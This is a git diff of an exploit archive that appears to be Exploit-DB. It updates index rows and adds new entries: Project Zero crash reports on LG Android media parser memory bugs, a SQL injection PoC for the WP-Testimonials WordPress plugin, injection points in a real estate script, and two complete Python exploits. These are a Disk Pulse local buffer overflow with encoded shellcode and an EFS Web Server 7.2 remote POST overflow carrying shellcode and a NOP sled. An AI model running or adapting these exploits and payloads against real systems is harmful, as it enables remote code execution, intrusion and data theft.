'exit.php' HTTP Response Splitting",2004-10-21,ChaoticEvil,php,webapps,0 -24698,platforms/php/webapps/24698.txt,"UBBCentral UBB.Threads 3.4/3.5 - Denial of Serviceearch.php SQL Injection",2004-10-21,"Florian Rock",php,webapps,0 +24698,platforms/php/webapps/24698.txt,"UBBCentral UBB.Threads 3.4/3.5 - 'Dosearch.php' SQL Injection",2004-10-21,"Florian Rock",php,webapps,0 24700,platforms/cgi/webapps/24700.txt,"Netbilling NBMEMBER Script - Information Disclosure",2004-10-22,ls,cgi,webapps,0 24702,platforms/php/webapps/24702.txt,"MoniWiki 1.0/1.1 - Wiki.php Cross-Site Scripting",2004-10-25,"Jeremy Bae",php,webapps,0 24703,platforms/cgi/webapps/24703.txt,"LinuxStat 2.x - Directory Traversal",2004-10-25,anonymous,cgi,webapps,0 @@ -29115,7 +29120,7 @@ id,file,description,date,author,platform,type,port 26968,platforms/php/webapps/26968.txt,"SyntaxCMS - Search Query Cross-Site Scripting",2005-12-21,r0t3d3Vil,php,webapps,0 26969,platforms/asp/webapps/26969.txt,"Tangora Portal CMS 4.0 - Action Parameter Cross-Site Scripting",2005-12-22,r0t3d3Vil,asp,webapps,0 26972,platforms/jsp/webapps/26972.txt,"oracle Application server discussion forum portlet - Multiple Vulnerabilities",2005-12-23,"Johannes Greil",jsp,webapps,0 -26973,platforms/php/webapps/26973.txt,"Cerberus Helpdesk 2.649 - cer_KnowledgebaseHandler.class.php _load_article_details Function SQL Injection",2005-12-27,"A. Ramos",php,webapps,0 +26973,platforms/php/webapps/26973.txt,"Cerberus Helpdesk 2.649 - 'cer_KnowledgebaseHandler.class.php' '_load_article_details' Function SQL Injection",2005-12-27,"A. Ramos",php,webapps,0 26974,platforms/php/webapps/26974.txt,"Cerberus Helpdesk 2.649 - addresses_export.php queues Parameter SQL Injection",2005-12-27,"A. Ramos",php,webapps,0 26975,platforms/php/webapps/26975.txt,"Cerberus Helpdesk 2.649 - display_ticket_thread.php ticket Parameter SQL Injection",2005-12-27,"A. Ramos",php,webapps,0 26976,platforms/php/webapps/26976.txt,"Dev Web Management System 1.5 - getfile.php cat Parameter SQL Injection",2005-12-27,retrogod@aliceposta.it,php,webapps,0 @@ -30462,7 +30467,7 @@ id,file,description,date,author,platform,type,port 28839,platforms/php/webapps/28839.txt,"SchoolAlumni Portal 2.26 - smumdadotcom_ascyb_alumni/mod.php katalog Module query Parameter Cross-Site Scripting",2006-10-23,MP,php,webapps,0 28840,platforms/php/webapps/28840.txt,"SchoolAlumni Portal 2.26 - mod.php mod Parameter Traversal Local File Inclusion",2006-10-23,MP,php,webapps,0 28842,platforms/php/webapps/28842.txt,"Zwahlen's Online Shop 5.2.2 - Cat Parameter Cross-Site Scripting",2006-10-23,MC.Iglo,php,webapps,0 -28843,platforms/php/webapps/28843.txt,"cPanel 10.9 - Denial of Serviceetmytheme theme Parameter Cross-Site Scripting",2006-10-23,Crackers_Child,php,webapps,0 +28843,platforms/php/webapps/28843.txt,"cPanel 10.9 - dosetmytheme 'theme' Parameter Cross-Site Scripting",2006-10-23,Crackers_Child,php,webapps,0 28844,platforms/php/webapps/28844.txt,"cPanel 10.9 - editzonetemplate template Parameter Cross-Site Scripting",2006-10-23,Crackers_Child,php,webapps,0 28845,platforms/php/webapps/28845.txt,"Shop-Script - Multiple HTTP Response Splitting Vulnerabilities",2006-10-23,"Debasis Mohanty",php,webapps,0 28846,platforms/php/webapps/28846.html,"WikiNi 0.4.x - Waka.php Multiple HTML Injection Vulnerabilities",2006-10-23,"Raphael Huck",php,webapps,0 @@ -31135,7 +31140,7 @@ id,file,description,date,author,platform,type,port 29748,platforms/php/webapps/29748.txt,"Holtstraeter Rot 13 - Enkrypt.php Directory Traversal",2007-03-16,"BorN To K!LL",php,webapps,0 29750,platforms/php/webapps/29750.php,"phpStats 0.1.9 - Multiple SQL Injections",2007-03-16,rgod,php,webapps,0 29751,platforms/php/webapps/29751.php,"phpStats 0.1.9 - PHP-Stats-options.php Remote Code Execution",2007-03-17,rgod,php,webapps,0 -29754,platforms/php/webapps/29754.html,"WordPress < 2.1.2 - PHP_Self Cross-Site Scripting",2007-03-19,"Alexander Concha",php,webapps,0 +29754,platforms/php/webapps/29754.html,"WordPress < 2.1.2 - PHP_Self Cross-Site Scripting",2007-03-19,"Alexander Concha",php,webapps,0 29755,platforms/php/webapps/29755.html,"Guesbara 1.2 - Administrator Password Change",2007-03-19,Kacper,php,webapps,0 29756,platforms/php/webapps/29756.txt,"PHPX 3.5.15/3.5.16 - 'print.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 29757,platforms/php/webapps/29757.txt,"PHPX 3.5.15/3.5.16 - 'forums.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 @@ -37991,3 +37996,5 @@ id,file,description,date,author,platform,type,port 42153,platforms/windows/webapps/42153.py,"EFS Easy Chat Server 3.1 - Password Disclosure",2017-06-09,"Aitezaz Mohsin",windows,webapps,0 42154,platforms/windows/webapps/42154.py,"EFS Easy Chat Server 3.1 - Password Reset",2017-06-09,"Aitezaz Mohsin",windows,webapps,0 42156,platforms/php/webapps/42156.txt,"PaulShop - SQL Injection",2017-06-10,Se0pHpHack3r,php,webapps,0 +42166,platforms/php/webapps/42166.txt,"WordPress Plugin WP-Testimonials < 3.4.1 - SQL Injection",2017-06-03,"Dimitrios Tsagkarakis",php,webapps,0 +42167,platforms/php/webapps/42167.txt,"Real Estate Classifieds Script - SQL Injection",2017-06-12,EziBilisim,php,webapps,0 diff --git a/platforms/android/dos/42169.txt b/platforms/android/dos/42169.txt new file mode 100755 index 000000000..9b914f401 --- /dev/null +++ b/platforms/android/dos/42169.txt @@ -0,0 +1,64 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1221 + +Similar to the previously reported issue 1206 , when parsing AVI files the +CAVIFileParser object contains a fixed-size array of (what appears to be) +pointer/length pairs, used (I suppose) to store the data for each stream. + +This is a fixed size, with 40 entries. However, it is never verified that the +number of streams in the file is less than this number; and when freeing the +CAVIFileParser object, we will iterate through this array past the end of the +object, freeing each non-NULL pointer entry. + +This presents initially as a free of an uninitialised pointer, since there is +a correctly aligned field inside the CAVIFileParser object that does not appear +to be used at all; careful heap grooming can turn this into a free of an +attacker controlled value. It can also however be used to traverse outside the +object by ensuring that this uninitialised value is a NULL pointer, and instead +free pointers from the object following the CAVIFileParser object, resulting in +a use-after-free. + +The attached sample file (and generation script) triggers the latter case, and +will usually crash attempting to free an invalid pointer from outside the bounds +of the CAVIFileParser object. + +The two quirks of the attached sample file necessary to reach this vulnerability +are that the number of streams in the avi are larger than 40 and that the file +is truncated before the strl LIST objects are completed, to avoid triggering a +NULL-pointer dereference attempting to retrieve the movi information for the +file. + +Build fingerprint: 'lge/p1_global_com/p1:6.0/MRA58K/1624210305d45:user/release-keys' +Revision: '11' +ABI: 'arm' +pid: 9473, tid: 9473, name: mediaserver >>> /system/bin/mediaserver <<< +signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xf0040070 +AM write failed: Broken pipe + r0 00000002 r1 0000000f r2 ffffffd0 r3 f6dd12f0 + r4 f6dd12e8 r5 f0051c88 r6 f6202000 r7 f0040000 + r8 f6209008 r9 f6dc4594 sl 00000001 fp ffc82f9c + ip f004003c sp ffc82d38 lr f6da67a7 pc f6da3826 cpsr 200f0030 + +backtrace: + #00 pc 00055826 /system/lib/libc.so (ifree+49) + #01 pc 000587a3 /system/lib/libc.so (je_free+374) + #02 pc 000059ad /system/lib/liblg_parser_avi.so (_ZN14CAVIFileParser7DestroyEv+164) + #03 pc 00005a33 /system/lib/liblg_parser_avi.so (_ZN14CAVIFileParserD1Ev+14) + #04 pc 00005a45 /system/lib/liblg_parser_avi.so (_ZN14CAVIFileParserD0Ev+4) + #05 pc 0000442f /system/lib/liblg_parser_avi.so (_ZN9AVIParser5CloseEv+12) + #06 pc 00025a49 /system/lib/libLGParserOSAL.so (_ZN7android14LGAVIExtractorC2ERKNS_2spINS_10DataSourceEEE+308) + #07 pc 00022a67 /system/lib/libLGParserOSAL.so (_ZN7android15LGExtractorOSAL17CreateLGExtractorERKNS_2spINS_10DataSourceEEEPKcRKNS1_INS_8AMessageEEE+38) + #08 pc 000c033b /system/lib/libstagefright.so (_ZN7android14MediaExtractor6CreateERKNS_2spINS_10DataSourceEEEPKc+242) + #09 pc 000d66db /system/lib/libstagefright.so (_ZN7android28StagefrightMetadataRetriever13setDataSourceERKNS_2spINS_10DataSourceEEE+34) + #10 pc 000591e3 /system/lib/libmediaplayerservice.so (_ZN7android23MetadataRetrieverClient13setDataSourceERKNS_2spINS_11IDataSourceEEE+82) + #11 pc 0008e329 /system/lib/libmedia.so (_ZN7android24BnMediaMetadataRetriever10onTransactEjRKNS_6ParcelEPS1_j+468) + #12 pc 00019931 /system/lib/libbinder.so (_ZN7android7BBinder8transactEjRKNS_6ParcelEPS1_j+60) + #13 pc 0001eccb /system/lib/libbinder.so (_ZN7android14IPCThreadState14executeCommandEi+550) + #14 pc 0001ee35 /system/lib/libbinder.so (_ZN7android14IPCThreadState20getAndExecuteCommandEv+64) + #15 pc 0001ee99 /system/lib/libbinder.so (_ZN7android14IPCThreadState14joinThreadPoolEb+48) + #16 pc 00001c15 /system/bin/mediaserver + #17 pc 000174a9 /system/lib/libc.so (__libc_init+44) + #18 pc 00001e68 /system/bin/mediaserver + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42169.zip diff --git a/platforms/android/dos/42170.txt b/platforms/android/dos/42170.txt new file mode 100755 index 000000000..6fea254da --- /dev/null +++ b/platforms/android/dos/42170.txt @@ -0,0 +1,80 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1206 + +Missing bounds-checking in AVI stream parsing + +When parsing AVI files, CAVIFileParser uses the stream count from the AVI header +to allocate backing storage for storing metadata about the streams (member +variable m_aStream). However, the number of stream headers we parse is never +validated against this allocation size during parsing, so we can write further +metadata past the end of this buffer by constructing a file which contains more +stream headers than expected. + +The allocation happens here: + +int CAVIFileParser::ParseChunkAviHdr(int a2, unsigned int chunk_size) +{ + struct AviHeader *avih; + int result; + + // snip some sanity checking (have we already found an 'avih' chunk, is this + // chunk large enough to contain an avi header.) + + result = AVISourceReader::AVI_fread(this->source, avih, sizeof(struct AviHeader), 1); + if ( result <= 0 ) + { + // snip... + } + else + { + stream_count = avih->dwStreams; // <-- this is an attacker-controlled count + this->m_aStreamCount = stream_count; + this->m_aStream = malloc(stream_count * sizeof(struct AviStream)); + this->m_aStreamIndex = -1; + + // snip... + } + + return 1; +} + +There doesn't appear to be any integer overflow checking in the multiplication +either; so if the current issue is directly fixed there could still be a +vulnerability if stream_count * sizeof(struct AviStream) overflows. + +this->m_aStreamIndex is incremented without checking in +CAVIFileParser::ParseChild and used as an index into m_aStream in several places +without checking, including in CAVIFileParser::ParseChunkStrHdr and +CAVIFileParser::ParseChunkStrFmt. + +Several of the values that we can get written out of bounds are pointers to +controlled data, which is an interesting exploitation primitive. I've attached +a PoC file and script to generate it which results in overlapping a SRIFFNode* +with the contents of a 'strf' chunk, resulting in a free of an attacker +controlled pointer - in this case, 0x41414141. Since the structure sizes are +dependent on the version of the library, this may not work on different builds, +but it will hopefully cause a crash regardless. + +Build fingerprint: 'lge/p1_global_com/p1:6.0/MRA58K/1624210305d45:user/release-keys' +Revision: '11' +ABI: 'arm' +pid: 19481, tid: 19585, name: Binder_2 >>> /system/bin/mediaserver <<< +signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x4140007c + r0 00000002 r1 00000012 r2 ffffffd0 r3 f6b572f0 +AM write failed: Broken pipe + r4 f6b572e8 r5 41414141 r6 f5fb6000 r7 41400000 + r8 f155c748 r9 f6b4a594 sl 00000001 fp f000081c + ip 41400048 sp f00005f8 lr f6b2c7a7 pc f6b29826 cpsr 200f0030 + +backtrace: + #00 pc 00055826 /system/lib/libc.so (ifree+49) + #01 pc 000587a3 /system/lib/libc.so (je_free+374) + #02 pc 000058f3 /system/lib/liblg_parser_avi.so (_ZN14CAVIFileParser15DeleteSRIFFNodeEP9SRIFFNode+54) + #03 pc 00005915 /system/lib/liblg_parser_avi.so (_ZN14CAVIFileParser7DestroyEv+12) + #04 pc 00005a33 /system/lib/liblg_parser_avi.so (_ZN14CAVIFileParserD1Ev+14) + #05 pc 00005a45 /system/lib/liblg_parser_avi.so (_ZN14CAVIFileParserD0Ev+4) + #06 pc 0000442f /system/lib/liblg_parser_avi.so (_ZN9AVIParser5CloseEv+12) + #07 pc 00025baf /system/lib/libLGParserOSAL.so (_ZN7android14LGAVIExtractorD1Ev+26) + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42170.zip diff --git a/platforms/android/dos/42171.txt b/platforms/android/dos/42171.txt new file mode 100755 index 000000000..e24fa018f --- /dev/null +++ b/platforms/android/dos/42171.txt @@ -0,0 +1,44 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1222 + +There is a memcpy in ASFParser::ParseHeaderExtensionObjects which doesn't check +that the size of the copy is smaller than the size of the source buffer, +resulting in an out-of-bounds heap read. + +The vulnerable code appears to be in handling the parsing of an extension object of +type ASF_Metadata_Object with a Description Record with an overly large length. + +See attached for a crash poc. This issue probably allows leaking mediaserver +memory from an app process on the device via the retrieved metadata. + +Build fingerprint: 'lge/p1_global_com/p1:6.0/MRA58K/1624210305d45:user/release-keys' +Revision: '11' +ABI: 'arm' +pid: 10423, tid: 10533, name: Binder_2 >>> /system/bin/mediaserver <<< +signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xf05c0000 + r0 ef5aff40 r1 f05bfff5 r2 00f5007f r3 00000000 + r4 f050b280 r5 f0510000 r6 00ffffff r7 00000000 + r8 000000b5 r9 00000034 sl 00000000 fp f05455a0 + ip f05e2e1c sp f06f35c8 lr f05d8c9d pc f71d77b4 cpsr 200b0010 + +backtrace: + #00 pc 000177b4 /system/lib/libc.so (__memcpy_base+88) + #01 pc 00003c99 /system/lib/liblg_parser_asf.so (_ZN9ASFParser27ParseHeaderExtensionObjectsEv+436) + #02 pc 00006a87 /system/lib/liblg_parser_asf.so (_ZN9ASFParser6OpenExEP11IDataSourcei+50) + #03 pc 00024a93 /system/lib/libLGParserOSAL.so (_ZN7android12ASFExtractorC1ERKNS_2spINS_10DataSourceEEERKNS1_INS_8AMessageEEE+270) + #04 pc 00022aa9 /system/lib/libLGParserOSAL.so (_ZN7android15LGExtractorOSAL17CreateLGExtractorERKNS_2spINS_10DataSourceEEEPKcRKNS1_INS_8AMessageEEE+104) + #05 pc 000c033b /system/lib/libstagefright.so (_ZN7android14MediaExtractor6CreateERKNS_2spINS_10DataSourceEEEPKc+242) + #06 pc 000d66db /system/lib/libstagefright.so (_ZN7android28StagefrightMetadataRetriever13setDataSourceERKNS_2spINS_10DataSourceEEE+34) + #07 pc 000591e3 /system/lib/libmediaplayerservice.so (_ZN7android23MetadataRetrieverClient13setDataSourceERKNS_2spINS_11IDataSourceEEE+82) + #08 pc 0008e329 /system/lib/libmedia.so (_ZN7android24BnMediaMetadataRetriever10onTransactEjRKNS_6ParcelEPS1_j+468) + #09 pc 00019931 /system/lib/libbinder.so (_ZN7android7BBinder8transactEjRKNS_6ParcelEPS1_j+60) + #10 pc 0001eccb /system/lib/libbinder.so (_ZN7android14IPCThreadState14executeCommandEi+550) + #11 pc 0001ee35 /system/lib/libbinder.so (_ZN7android14IPCThreadState20getAndExecuteCommandEv+64) + #12 pc 0001ee99 /system/lib/libbinder.so (_ZN7android14IPCThreadState14joinThreadPoolEb+48) + #13 pc 00023909 /system/lib/libbinder.so + #14 pc 000100d1 /system/lib/libutils.so (_ZN7android6Thread11_threadLoopEPv+112) + #15 pc 0003f9ab /system/lib/libc.so (_ZL15__pthread_startPv+30) + #16 pc 0001a0c5 /system/lib/libc.so (__start_thread+6) + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42171.zip diff --git a/platforms/php/webapps/42166.txt b/platforms/php/webapps/42166.txt new file mode 100755 index 000000000..2de02fa58 --- /dev/null +++ b/platforms/php/webapps/42166.txt @@ -0,0 +1,43 @@ +# Exploit Title: WP-Testimonials < 3.4.1 Union Based SQL Injection +# Date: 03-06-2017 +# Exploit Author: Dimitrios Tsagkarakis +# Website: dtsa.eu +# Software Link: https://en-gb.wordpress.org/plugins/wp-testimonials/ +# Vendor Homepage: http://www.sunfrogservices.com/web-programmer/wp-testimonials/ +# Version: 3.4.1 +# CVE : CVE-2017-9418 + +# Category: webapps + + + +1. Description: + + + +SQL injection vulnerability in the WP-Testimonials plugin 3.4.1 for +WordPress allows an authenticated user to execute arbitrary SQL commands via +the testid parameter to wp-admin/admin.php. + +2. Proof of Concept: + +http://[wordpress_site]/wp-admin/admin.php?page=sfstst_manage&mode=sfststedi +t&testid=-1 UNION ALL SELECT NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL-- +comment + +3. Solution: + + + +The plugin has been removed from WordPress. Deactivate the plug-in and wait +for a hotfix. + + + +4. Reference: + +http://dtsa.eu/wp-testimonials-wordpress-plugin-v-3-4-1-union-based-sql-inje +ction-sqli/ + +http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9418 + diff --git a/platforms/php/webapps/42167.txt b/platforms/php/webapps/42167.txt new file mode 100755 index 000000000..879260207 --- /dev/null +++ b/platforms/php/webapps/42167.txt @@ -0,0 +1,20 @@ +# # # # # +# Exploit Title: Real Estate Classifieds Script - SQL Injection +# Dork: N/A +# Date: 12.06.2017 +# Vendor : http://www.easyrealestatescript.com/ +# Software: http://www.easyrealestatescript.com/demo.html +# Demo: http://www.easyrealestatescript.com/demo.html +# Version: N/A +# # # # # +# Author: EziBilisim +# Author Web: https://ezibilisim.com/ +# Seo, Web tasarim, Web yazilim, Web guvenlik hizmetleri sunar. +# # # # # +# SQL Injection : +# http://localhost/[PATH]/site_search.php?s_purpose=[SQL] +# http://localhost/[PATH]/seller_listing_info_calendar_title.php?listing=&xmonth=[SQL]&xyear=[SQL] +# http://localhost/[PATH]/seller_listing_info_calendar_prev.php?listing=&xmonth=[SQL]&xyear=[SQL] +# http://localhost/[PATH]/seller_listing_info_calendar_next.php?listing=&xmonth=[SQL]&xyear=[SQL] +# http://localhost/[PATH]/seller_listing_info_calendar_big.php?listing=&xmonth=[SQL]&xyear=[SQL] +# # # # # \ No newline at end of file diff --git a/platforms/windows/local/42163.py b/platforms/windows/local/42163.py new file mode 100755 index 000000000..f593df52f --- /dev/null +++ b/platforms/windows/local/42163.py @@ -0,0 +1,80 @@ +#!/usr/bin/python + +############################################################################### +# Exploit Title: Disk Pulse v9.7.26 - Add Directory Local Buffer Overflow +# Date: 12-06-2017 +# Exploit Author: abatchy17 -- @abatchy17 +# Vulnerable Software: Disk Pulse v9.7.26 (Freeware, Pro, Ultimate) +# Vendor Homepage: http://www.diskpulse.com/ +# Version: 9.7.14 +# Software Link: http://www.diskpulse.com/downloads.html (Freeware, Pro, Ultimate) +# Tested On: Windows XP SP3 (x86), Win7 SP1 (x86) +# +# To trigger the exploit: +# 1. Under Directories, click the plus sign +# 2. Paste content of exploit.txt in Add Directory textbox. +# +# <--- Marry and reproduce ---> +# +############################################################################## + +a = open("exploit.txt", "w") + +badchars = "\x0a\x0d\x2f" + +# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "\x0a\x0d\x2f" +buf = "" +buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" +buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" +buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +buf += "\x6b\x4c\x5a\x48\x4f\x72\x57\x70\x75\x50\x43\x30\x43" +buf += "\x50\x4b\x39\x4d\x35\x44\x71\x79\x50\x63\x54\x6e\x6b" +buf += "\x62\x70\x76\x50\x6e\x6b\x42\x72\x46\x6c\x6e\x6b\x63" +buf += "\x62\x62\x34\x6c\x4b\x43\x42\x76\x48\x36\x6f\x68\x37" +buf += "\x73\x7a\x46\x46\x74\x71\x49\x6f\x4e\x4c\x57\x4c\x55" +buf += "\x31\x51\x6c\x35\x52\x46\x4c\x51\x30\x6a\x61\x6a\x6f" +buf += "\x64\x4d\x67\x71\x6b\x77\x79\x72\x68\x72\x70\x52\x70" +buf += "\x57\x6c\x4b\x53\x62\x36\x70\x6c\x4b\x52\x6a\x67\x4c" +buf += "\x4c\x4b\x50\x4c\x62\x31\x42\x58\x79\x73\x32\x68\x37" +buf += "\x71\x4a\x71\x73\x61\x4e\x6b\x63\x69\x31\x30\x35\x51" +buf += "\x69\x43\x4c\x4b\x50\x49\x64\x58\x58\x63\x46\x5a\x32" +buf += "\x69\x6e\x6b\x36\x54\x4e\x6b\x57\x71\x38\x56\x65\x61" +buf += "\x49\x6f\x6e\x4c\x69\x51\x7a\x6f\x66\x6d\x46\x61\x69" +buf += "\x57\x70\x38\x39\x70\x33\x45\x39\x66\x35\x53\x31\x6d" +buf += "\x68\x78\x75\x6b\x73\x4d\x71\x34\x70\x75\x38\x64\x33" +buf += "\x68\x4e\x6b\x32\x78\x51\x34\x65\x51\x39\x43\x31\x76" +buf += "\x4c\x4b\x64\x4c\x32\x6b\x6e\x6b\x62\x78\x65\x4c\x47" +buf += "\x71\x59\x43\x4c\x4b\x44\x44\x4c\x4b\x56\x61\x38\x50" +buf += "\x6f\x79\x52\x64\x54\x64\x34\x64\x63\x6b\x73\x6b\x50" +buf += "\x61\x50\x59\x71\x4a\x56\x31\x59\x6f\x59\x70\x33\x6f" +buf += "\x53\x6f\x71\x4a\x4c\x4b\x44\x52\x68\x6b\x6e\x6d\x53" +buf += "\x6d\x62\x4a\x56\x61\x4c\x4d\x6b\x35\x6d\x62\x75\x50" +buf += "\x45\x50\x75\x50\x32\x70\x32\x48\x76\x51\x4e\x6b\x30" +buf += "\x6f\x6f\x77\x39\x6f\x4e\x35\x4d\x6b\x58\x70\x4d\x65" +buf += "\x4e\x42\x53\x66\x62\x48\x6d\x76\x4a\x35\x6d\x6d\x4d" +buf += "\x4d\x69\x6f\x79\x45\x57\x4c\x46\x66\x53\x4c\x56\x6a" +buf += "\x6f\x70\x49\x6b\x6d\x30\x33\x45\x33\x35\x4d\x6b\x50" +buf += "\x47\x37\x63\x74\x32\x52\x4f\x53\x5a\x43\x30\x53\x63" +buf += "\x49\x6f\x38\x55\x52\x43\x63\x51\x50\x6c\x65\x33\x54" +buf += "\x6e\x62\x45\x54\x38\x62\x45\x55\x50\x41\x41" + +# 0x651c541f : jmp ebp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.3.4.0 (C:\Program Files\Disk Pulse\bin\QtGui4.dll) + +jmpebp = "\x1f\x54\x1c\x65" # Why JMP EBP? Buffer at ESP is split, bad! Example: EBP: AAA\BBB, ESP -> AAA (without the \BBB part) + +llamaleftovers = ( + "\x55" # push EBP + "\x58" # pop EAX + "\x05\x55\x55\x55\x55" # add EAX, 0x55555555 + "\x05\x55\x55\x55\x55" # add EAX, 0x55555555 + "\x05\x56\x56\x55\x55" # add EAX, 0x55555656 -> EAX = EBP + 0x200 + "\x40" # inc EAX, shellcode generated should start exactly here (EBP + 0x201) as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode + ) + +junk = "\x55" + "\x53\x5b" * 107 + +data = "A"*4096 + jmpebp + "\x40\x48" * 20 + llamaleftovers + junk + buf + +a.write(data) +a.close() diff --git a/platforms/windows/remote/42165.py b/platforms/windows/remote/42165.py new file mode 100755 index 000000000..fc3680ee1 --- /dev/null +++ b/platforms/windows/remote/42165.py @@ -0,0 +1,84 @@ +#!/usr/bin/python + +# Title : EFS Web Server 7.2 POST HTTP Request Buffer Overflow +# Author : Touhid M.Shaikh +# Date : 12 June, 2017 +# Contact: touhidshaikh22@gmail.com +# Version: 7.2 +# category: Remote Exploit +# Tested on: Windows XP SP3 EN [Version 5.1.2600] + + +""" +######## Description ######## + + What is Easy File Sharing Web Server 7.2 ? + Easy File Sharing Web Server is a file sharing software that allows +visitors to upload/download files easily through a Web Browser. It can help +you share files with your friends and colleagues. They can download files +from your computer or upload files from theirs.They will not be required to +install this software or any other software because an internet browser is +enough. Easy File Sharing Web Server also provides a Bulletin Board System +(Forum). It allows remote users to post messages and files to the forum. +The Secure Edition adds support for SSL encryption that helps protect +businesses against site spoofing and data corruption. + + +######## Video PoC and Article ######## + +https://www.youtube.com/watch?v=Mdmd-7M8j-M +http://touhidshaikh.com/blog/poc/EFSwebservr-postbufover/ + + """ + +import httplib + + +total = 4096 + +#Shellcode Open CMD.exe +shellcode = ( +"\x8b\xec\x55\x8b\xec" +"\x68\x65\x78\x65\x2F" +"\x68\x63\x6d\x64\x2e" +"\x8d\x45\xf8\x50\xb8" +"\xc7\x93\xc2\x77" +"\xff\xd0") + + +our_code = "\x90"*100 #NOP Sled +our_code += shellcode +our_code += "\x90"*(4072-100-len(shellcode)) + +# point Ret to Nop Sled +our_code += "\x3c\x62\x83\x01" # Overwrite RET +our_code += "\x90"*12 #Nop Sled +our_code += "A"*(total-(4072+16)) # ESP pointing + + + +# Server address and POrt +httpServ = httplib.HTTPConnection("192.168.1.6", 80) +httpServ.connect() + +httpServ.request('POST', '/sendemail.ghp', +'Email=%s&getPassword=Get+Password' % our_code) + +response = httpServ.getresponse() + + +httpServ.close() + +""" +NOTE : After Exiting to cmd.exe our server will be crash bcz of esp +Adjust esp by yourself ... hehhehhe... +""" + +""" +__ __| _ \ | | | |_ _| __ \ + | | | | | | | | | | + | | | | | ___ | | | | + _| \___/ \___/ _| _|___|____/ + +Touhid M.Shaikh +"""